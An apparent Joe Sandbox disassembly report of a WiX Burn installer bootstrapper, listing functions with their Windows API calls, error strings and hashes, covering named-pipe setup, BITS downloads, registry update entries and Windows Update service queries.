Part of subcall function 007D4B96: UuidCreate.RPCRT4(?), ref: 007D4BC9

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,007E21A5,?,?,00000000,?,?,?), ref: 007ECB1E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 007ECB28
GetProcessId.KERNEL32(007E21A5,?,?,00000000,?,?,?,?), ref: 007ECB60

Part of subcall function 007D52E3: lstrlenW.KERNEL32(?,?,00000000,?,0080B4F0,?,00000000,?,007C442A,?,0080B4F0), ref: 007D5304
Part of subcall function 007D52E3: GetCurrentProcessId.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D530F
Part of subcall function 007D52E3: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D5346
Part of subcall function 007D52E3: ConnectNamedPipe.KERNEL32(?,00000000,?,007C442A,?,0080B4F0), ref: 007D535B
Part of subcall function 007D52E3: GetLastError.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D5365
Part of subcall function 007D52E3: Sleep.KERNEL32(00000064,?,007C442A,?,0080B4F0), ref: 007D5396
Part of subcall function 007D52E3: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D53B9
Part of subcall function 007D52E3: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D53D4
Part of subcall function 007D52E3: WriteFile.KERNEL32(?,*D|,0080B4F0,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D53EF
Part of subcall function 007D52E3: WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,007C442A,?,0080B4F0), ref: 007D540A

Part of subcall function 00800917: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,007C4E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00800927
Part of subcall function 00800917: GetLastError.KERNEL32(?,?,007C4E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800935

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007EC992,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECBE4
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007EC992,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECBF3
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,007EC992,?,?,?,?,?,00000000,?,?,?), ref: 007ECC0A

Strings

Failed to create embedded process at path: %ls, xrefs: 007ECB56
Failed to create embedded pipe., xrefs: 007ECACA
%ls -%ls %ls %ls %u, xrefs: 007ECAE3
Failed to wait for embedded process to connect to pipe., xrefs: 007ECB82
Failed to process messages from embedded message., xrefs: 007ECBA7
Failed to allocate embedded command., xrefs: 007ECAF7
burn.embedded, xrefs: 007ECADB
Failed to wait for embedded executable: %ls, xrefs: 007ECBC7
Failed to create embedded pipe name and client token., xrefs: 007ECAA3
embedded.cpp, xrefs: 007ECB49

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: 2a66ccc5456f2c734f4503019d44a571ae3bfb8a6862d6c17d06add08ce73df4
Instruction ID: f050cf7ade3120c77b7f4b153618a8d3d2c5db301ff0eb2f83cb9b4aa7b1b163
Opcode Fuzzy Hash: 2a66ccc5456f2c734f4503019d44a571ae3bfb8a6862d6c17d06add08ce73df4
Instruction Fuzzy Hash: 65516172D41229BBDF12DBA4DC46FDEBBB8EB08710F104126FA00F6291D7789A519B91

Function 00807E36 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00808320,00000001,?), ref: 00807E56
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00808320,00000001,?), ref: 00807E71
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00808320,00000001,?), ref: 00807E8C
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00808320,00000001,?), ref: 00807EF8
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00808320,00000001,?), ref: 00807F1C
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00808320,00000001,?), ref: 00807F40
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00808320,00000001,?), ref: 00807F60
lstrlenW.KERNEL32(006C0064,?,00808320,00000001,?), ref: 00807F7B

Strings

sha256, xrefs: 00807F57
msi.dll, xrefs: 00807E50
digest, xrefs: 00807E68
algorithm, xrefs: 00807EEF
sha1, xrefs: 00807F37
apuputil.cpp, xrefs: 00807F93
md5, xrefs: 00807F13
http://appsyndication.org/2006/appsyn, xrefs: 00807E49
name, xrefs: 00807E83

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: 312855021f91ada5ab10ba7292061fe879eea495d16030d91da0121d6e1dd1ce
Instruction ID: 06aae317c1b7c6bad61e0b8de18f857d4f2b1c88a2313fb56389b79dec4c37ec
Opcode Fuzzy Hash: 312855021f91ada5ab10ba7292061fe879eea495d16030d91da0121d6e1dd1ce
Instruction Fuzzy Hash: E9517D71A4C222BBEB604F54DC46F267A61FB15B30F208354FA35EA6E5DB64FC908790

Function 007C9F2B Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 216COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9FA3

Strings

Trying per-user extended info for property '%ls' for product: %ls, xrefs: 007CA062
Failed to get product info., xrefs: 007CA0D5
Failed to set variable., xrefs: 007CA12E
Failed to copy upgrade code., xrefs: 007CA003
Unsupported product search type: %u, xrefs: 007C9F6B
AssignmentType, xrefs: 007C9F7E
Product or related product not found: %ls, xrefs: 007CA08E
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 007CA035
Failed to change value type., xrefs: 007CA10F
Language, xrefs: 007C9F8C
Failed to format GUID string., xrefs: 007C9FAE
State, xrefs: 007C9F85
Failed to enumerate related products for upgrade code., xrefs: 007C9FDE
VersionString, xrefs: 007C9F93, 007CA01E, 007CA034, 007CA048, 007CA061, 007CA075
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA141

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: 140c1a8354992dad69c7c1f7a7240fa5a4b63820232adb2bb7ca1197531b79c1
Instruction ID: 9bf0cf24c87bef30161725b1487f7fe1c00687516856d053f7525545e23be8b9
Opcode Fuzzy Hash: 140c1a8354992dad69c7c1f7a7240fa5a4b63820232adb2bb7ca1197531b79c1
Instruction Fuzzy Hash: 0761F332D4021DBBCB519AA8CD49FEE7B79EB04359F14016DF500FA291D27ADE409792

Function 007EDC0D Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,007E9751,75C08550,?,?,00000000,?,?,?,00000001,00000000,?), ref: 007EDC28

Strings

Failed to copy download URL., xrefs: 007EDC6F
Failed to initialize BITS job callback., xrefs: 007EDD49
Failed to set credentials for BITS job., xrefs: 007EDCD6
Invalid BITS user URL: %ls, xrefs: 007EDC4A
Failed to download BITS job., xrefs: 007EDDBF
Falied to start BITS job., xrefs: 007EDDE0
Failed to add file to BITS job., xrefs: 007EDCF5
Failed to create BITS job., xrefs: 007EDCB7
Failed while waiting for BITS download., xrefs: 007EDDD9
Failed to complete BITS job., xrefs: 007EDDD2
Failed to create BITS job callback., xrefs: 007EDD3B
bitsuser.cpp, xrefs: 007EDC3E, 007EDD31
Failed to set callback interface for BITS job., xrefs: 007EDD60

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS user URL: %ls$bitsuser.cpp
API String ID: 1659193697-2382896028
Opcode ID: 867dd9149662e8b67a09b81525d1c801795c39588ad85eb70a0de2114d9279d6
Instruction ID: d4b216f85bd7619eef6735c3473df59ae57d062d7ac0999650d9b4b9250fc36d
Opcode Fuzzy Hash: 867dd9149662e8b67a09b81525d1c801795c39588ad85eb70a0de2114d9279d6
Instruction Fuzzy Hash: 8061F031A02265EBCB219B95DC89E6E7BB4EF0CB20B214156FC05EB252E778DD40DB90

Function 007CEBB2 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 007CED40

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

SysFreeString.OLEAUT32(?), ref: 007CECF8

Strings

Failed to convert SoftwareTag text to UTF-8, xrefs: 007CED75
Failed to get SoftwareTag text., xrefs: 007CED7F
Failed to get @Filename., xrefs: 007CED9D
Failed to get @Path., xrefs: 007CED89
Failed to select software tag nodes., xrefs: 007CEBE2
Failed to allocate memory for software tag structs., xrefs: 007CEC3F
Regid, xrefs: 007CEC8E
registration.cpp, xrefs: 007CEC35
Failed to get software tag count., xrefs: 007CEC07
SoftwareTag, xrefs: 007CEBC1
Failed to get next node., xrefs: 007CEDA7
Filename, xrefs: 007CEC73
Failed to get @Regid., xrefs: 007CED93
Path, xrefs: 007CECA6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
API String ID: 336948655-1068704183
Opcode ID: b567849c897b81f4dd868524ac3faf2c9c4fa68e9bef8bf42ca5f8ca25f0c772
Instruction ID: dd348b17edad82f3426149e6b7efaf3c2e0320bff303380af4871cd7a9b35b44
Opcode Fuzzy Hash: b567849c897b81f4dd868524ac3faf2c9c4fa68e9bef8bf42ca5f8ca25f0c772
Instruction Fuzzy Hash: 0551A175A01329ABCB219F54CC95FAEBBA8FF04710F5141ADF916EB280D778DE409B90

Function 007D4933 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 155sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 007D498D
GetLastError.KERNEL32 ref: 007D499B
Sleep.KERNEL32(00000064), ref: 007D49BF

Strings

\\.\pipe\%ls, xrefs: 007D4945
feclient.dll, xrefs: 007D49F2, 007D4A8D, 007D4AA1, 007D4AE5
Failed to allocate name of parent cache pipe., xrefs: 007D4A34
pipe.cpp, xrefs: 007D49D8, 007D4ADB
\\.\pipe\%ls.Cache, xrefs: 007D4A20
Failed to verify parent pipe: %ls, xrefs: 007D4A07
Failed to open companion process with PID: %u, xrefs: 007D4AE7
Failed to open parent pipe: %ls, xrefs: 007D49E5
Failed to allocate name of parent pipe., xrefs: 007D4959

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-3212458075
Opcode ID: d00951852b943ea4871d461371d80b1b3311d0faa04adc519ce27776815855e9
Instruction ID: c5ede57236d565c389648e09b064bb4bf782fbd340e7eef327635d6f542d795c
Opcode Fuzzy Hash: d00951852b943ea4871d461371d80b1b3311d0faa04adc519ce27776815855e9
Instruction Fuzzy Hash: 6B41E672A80721BBDB215AA4DC06F9B76B8FF00720F118226FD15F6290D77D9E509AD8

Function 007CF410 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,007D0348,InstallerVersion,InstallerVersion,00000000,007D0348,InstallerName,InstallerName,00000000,007D0348,Date,InstalledDate,00000000,007D0348,LogonUser), ref: 007CF5BE

Part of subcall function 00801392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF1C2,00000000,?,00020006), ref: 008013C5

Strings

PublishingGroup, xrefs: 007CF4F2, 007CF505
LogonUser, xrefs: 007CF534
InstallerName, xrefs: 007CF56F, 007CF574, 007CF575, 007CF585
Failed to get the formatted key path for update registration., xrefs: 007CF432
InstalledDate, xrefs: 007CF54F, 007CF568
ReleaseType, xrefs: 007CF515, 007CF51A, 007CF529
ThisVersionInstalled, xrefs: 007CF46A, 007CF47D
Failed to create the key for update registration., xrefs: 007CF45E
Failed to write %ls value., xrefs: 007CF5A7
Date, xrefs: 007CF554
PackageVersion, xrefs: 007CF4AA, 007CF4BD
PackageName, xrefs: 007CF48A, 007CF49D
InstallerVersion, xrefs: 007CF58C, 007CF591, 007CF592, 007CF5A2
Publisher, xrefs: 007CF4CA, 007CF4DD
InstalledBy, xrefs: 007CF52F, 007CF548

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: 053d776370fdf3a205f714e6887f6186d02450f270817a96d4c167199e218869
Instruction ID: df2fb0237779fc159bf2e67c722ec900e60ca00843d9c7d21dfbae48769bd740
Opcode Fuzzy Hash: 053d776370fdf3a205f714e6887f6186d02450f270817a96d4c167199e218869
Instruction Fuzzy Hash: 1A418632A41A65BBCB225A54DC06FBE7B6AFF00720F11426CF910F6391D76D9E70A781

Function 007E678F Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 150serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,007E6CE1,?), ref: 007E67C8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6CE1,?,?,?), ref: 007E67D5
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,007E6CE1,?,?,?), ref: 007E681D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6CE1,?,?,?), ref: 007E6829
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,007E6CE1,?,?,?), ref: 007E6863
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6CE1,?,?,?), ref: 007E686D
CloseServiceHandle.ADVAPI32(00000000), ref: 007E6924
CloseServiceHandle.ADVAPI32(?), ref: 007E692E

Strings

l~, xrefs: 007E67B0
Failed to read configuration for WU service., xrefs: 007E68D4
Failed to open WU service., xrefs: 007E6857
Failed to query status of WU service., xrefs: 007E689B
wuauserv, xrefs: 007E6817
Failed to open service control manager., xrefs: 007E6803
msuuser.cpp, xrefs: 007E67F9, 007E684D, 007E6891
Failed to mark WU service to start on demand., xrefs: 007E68F5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuuser.cpp$wuauserv$l~
API String ID: 971853308-4103023390
Opcode ID: 66b7e35d217b2adf11fea03b41201689ad03b59a7b7044e70e772352c271c2ee
Instruction ID: c2416f7abec8d93a53707cf8c9415429f984c00a60b00701907701c3906953d0
Opcode Fuzzy Hash: 66b7e35d217b2adf11fea03b41201689ad03b59a7b7044e70e772352c271c2ee
Instruction Fuzzy Hash: 9441A571B013649BEB10ABAA8C85BAA77E8EF58790F018429FD15F7241D778DC4086A0

Function 007DE563 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 135registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 007DE5AE
RegisterClassW.USER32(?), ref: 007DE5DA
GetLastError.KERNEL32 ref: 007DE5E5
CreateWindowExW.USER32(00000080,00819CC4,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 007DE64C
GetLastError.KERNEL32 ref: 007DE656
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 007DE6F4

Strings

WixBurnMessageWindow, xrefs: 007DE5D3, 007DE6EF
Failed to create window., xrefs: 007DE684
uithread.cpp, xrefs: 007DE609, 007DE67A
Unexpected return value from message pump., xrefs: 007DE6DF
Failed to register window., xrefs: 007DE613

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 0d7d13700a70130e457fe67f545ef1997b50f14edbb3aeb45c44d7ec4dd35486
Instruction ID: 804d7146fa58277e639bba23c1334736564561c27433f0e211894586e06fda57
Opcode Fuzzy Hash: 0d7d13700a70130e457fe67f545ef1997b50f14edbb3aeb45c44d7ec4dd35486
Instruction Fuzzy Hash: 33418272A00214EBDB619BA4DC44ADABFF8FF08750F218126F909EA390D735D950CBE1

Function 007EC517 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to copy local source path for passthrough pseudo bundle., xrefs: 007EC75A
Failed to copy related arguments for passthrough bundle package, xrefs: 007EC825
pseudobundle.cpp, xrefs: 007EC54B, 007EC744, 007EC77E
Failed to copy filename for passthrough pseudo bundle., xrefs: 007EC761
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 007EC78A
Failed to copy cache id for passthrough pseudo bundle., xrefs: 007EC7A8
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 007EC84F
Failed to copy key for passthrough pseudo bundle payload., xrefs: 007EC768
Failed to recreate command-line arguments., xrefs: 007EC7E6
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 007EC557
Failed to copy download source for passthrough pseudo bundle., xrefs: 007EC732
Failed to copy key for passthrough pseudo bundle., xrefs: 007EC72B
Failed to copy install arguments for passthrough bundle package, xrefs: 007EC805
Failed to allocate memory for pseudo bundle payload hash., xrefs: 007EC750

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: defc5c1f240d2aa7c2de9f61d48bbbba5a4cb29a5bc72288a5d120a931a85678
Instruction ID: 44b1cd01ce9c6bba6b8ca749729fe473a487203c6d03f42e0fa083074318ed6b
Opcode Fuzzy Hash: defc5c1f240d2aa7c2de9f61d48bbbba5a4cb29a5bc72288a5d120a931a85678
Instruction Fuzzy Hash: 7BB17879A01645EFDB12DF29C881F96BBA5FF08710F108169FA149B352C739E862DB90

Function 007CBB30 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 189processCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007CBB82
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 007CBC8F
GetLastError.KERNEL32(?,?,?,?), ref: 007CBC99
WaitForInputIdle.USER32(?,?), ref: 007CBCED
CloseHandle.KERNEL32(?,?,?), ref: 007CBD38
CloseHandle.KERNEL32(?,?,?), ref: 007CBD45

Strings

approvedexe.cpp, xrefs: 007CBCBD
Failed to format argument string., xrefs: 007CBB8D
Failed to create executable command., xrefs: 007CBBBC
Failed to format obfuscated argument string., xrefs: 007CBBD9
Failed to CreateProcess on path: %ls, xrefs: 007CBCCA
"%ls" %s, xrefs: 007CBBA8, 007CBBE9
"%ls", xrefs: 007CBBFF, 007CBC19
Failed to create obfuscated executable command., xrefs: 007CBC2D
D, xrefs: 007CBC6E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
API String ID: 155678114-2737401750
Opcode ID: f81a6471e248764a09b059899e2b966f108942342065f703944beff63f155f1b
Instruction ID: b98a6e5d444541ad9f3d94ad7965e0ad13acbf92f3fe1c10821ad246220fa86c
Opcode Fuzzy Hash: f81a6471e248764a09b059899e2b966f108942342065f703944beff63f155f1b
Instruction Fuzzy Hash: 68512872D0061ABBDF21AFA4CC42EAEBB79FF04310F10416DFA14A6251D7399E549BA1

Function 007CB106 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 136COMMON

Download Yara Rule

APIs

